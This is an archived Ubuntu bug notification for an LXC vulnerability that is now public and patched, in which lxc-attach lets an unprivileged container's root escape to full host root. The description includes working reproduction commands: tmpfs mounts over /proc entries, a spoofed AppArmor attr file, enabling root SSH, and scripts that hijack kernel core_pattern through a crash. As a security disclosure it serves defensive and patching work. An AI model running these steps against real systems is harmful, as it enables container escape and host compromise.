touch-packages team mailing list archive

Thread
Date
[Bug 1475050] Re: unprivileged guest to host real-root escape via lxc-attach

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Marc Deslauriers <marc.deslauriers@xxxxxxxxxxxxx>
Date: Fri, 18 Dec 2015 12:10:16 -0000
Reply-to: Bug 1475050 <1475050@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1475050

Title:
  unprivileged guest to host real-root escape via lxc-attach

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found, that lxc-attach
  attempts to read guest mount namespace /proc entries before confining
  to new apparmor policy and dropping host uid/gid. By unmounting /proc
  within guest as root and replacing it with rogue version, lxc-attach
  fails to apply the new security policy and also to apply
  PR_SET_SECCOMP. Therefore getting "unconfined" apparmor profile
  requires only single invocation of lxc-attach. The unconfined settings
  already allow bind mounts, pivot_root and some other quite powerful
  syscalls, so second round of lxc-attach might not be needed. Currently
  second round uses host guest uid=0 process too attach to a real euid=0
  process to escalate then to full host root privileges, e.g. via
  modifying /proc/sys/kernel/core_pattern and triggering a core dump.

  Steps to reproduce:

  Get unconfined:
  ===============

  * Use SSH to get arbitrary number of unconfined sessions,
    just convenience for testing:

  apt-get install openssh-server
  stop ssh

  Edit /etc/ssh/sshd_config to allow password login

  Set root password

  * Prepare to lock next lxc-attach to get "unconfined":

  mount -t tmpfs tmpfs /proc/1
  mknod /proc/1/status p

  * Replace /bin/sh or link it to sshd instead, for testing call it
  directly:

  lxc-attach --name testguest /usr/sbin/sshd

  * In guest make apparmor fail by second tmpfs mount:

  ps aux | grep lxc-attach

  pid=554
  mount -t tmpfs tmpfs "/proc/${pid}/attr"
  touch "/proc/${pid}/attr/current"
  chmod 0666 "/proc/${pid}/attr/current"
  echo "" > /proc/1/status

  * Use the unconfined shells:

  # cat /proc/self/attr/current
  lxc-container-default (enforce)

  # ssh root@localhost
  ...
  # cat /proc/self/attr/current
  unconfined

  * Wait for the next lxc-attach, use unconfined to escape:

  lxc-attach --name testguest /bin/true

  In guest:

  cat <<EOF > /escape
  #!/bin/sh
  echo "|/bin/sh -c /var/lib/lxc/*/rootfs/escape2" > /proc/sys/kernel/core_pattern
  EOF
  chmod 0755 /escape

  cat <<EOF > /escape2
  #!/bin/sh
  touch /this-should-be-on-outside
  EOF
  chmod 0755 /escape2

  ps aux | grep lxc-attach
  /root/Testing/PtraceHelper 2688

  ulimit -c unlimited
  sleep 100 &
  kill -SEGV 3030

  Affected system:

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: (none)
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
       1.0.7-0ubuntu0.1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages
       1.0.3-0ubuntu3 0
          500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1475050/+subscriptions